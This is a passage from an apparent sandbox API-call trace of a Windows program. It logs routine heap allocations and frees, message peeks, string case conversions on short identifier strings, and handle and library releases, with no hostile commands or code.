(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0206.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.538] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0206.538] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0206.538] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0206.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0206.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0206.538] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0206.538] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0206.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0206.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0206.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.538] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0206.538] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0206.538] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0206.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0206.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0206.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.539] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0206.539] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0206.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0206.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0206.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0206.539] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.539] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0206.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0206.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0206.539] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.540] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0206.540] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0206.540] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0206.540] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0206.540] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.540] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.540] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.540] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0206.540] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.540] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0206.540] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.540] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.540] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0206.540] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.540] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0206.541] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.541] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.541] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.541] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.541] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.541] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.541] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.541] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.541] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.541] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.541] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.541] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.541] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.541] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.541] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.541] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0206.542] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.542] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0206.542] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.542] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.542] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.542] CryptReleaseContext (hProv=0xad2940, dwFlags=0x0) returned 1 [0206.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0206.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0206.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0206.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0206.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0206.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0206.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0206.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0206.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0206.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0206.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0206.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0206.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0206.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a9e68 | out: hHeap=0x25c0000) returned 1 [0206.544] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.544] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.544] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.544] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0206.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.545] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0206.545] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0206.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0206.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0206.545] FreeLibrary (hLibModule=0x74d40000) returned 1 [0206.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0206.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.546] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.546] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0206.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.546] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0206.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0206.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0206.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0206.546] CloseHandle (hObject=0x1f8) returned 1 [0206.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0206.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0206.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0206.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0206.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0206.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0206.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.547] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0206.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0206.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0206.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0206.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0206.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0206.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0206.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0206.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0206.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ff0 [0206.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa038 [0206.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0206.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0206.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0206.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0206.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0206.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.549] CloseHandle (hObject=0x268) returned 1 [0206.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34c2258 | out: hHeap=0x25c0000) returned 1 [0206.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0206.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0206.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0206.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0206.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0206.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) 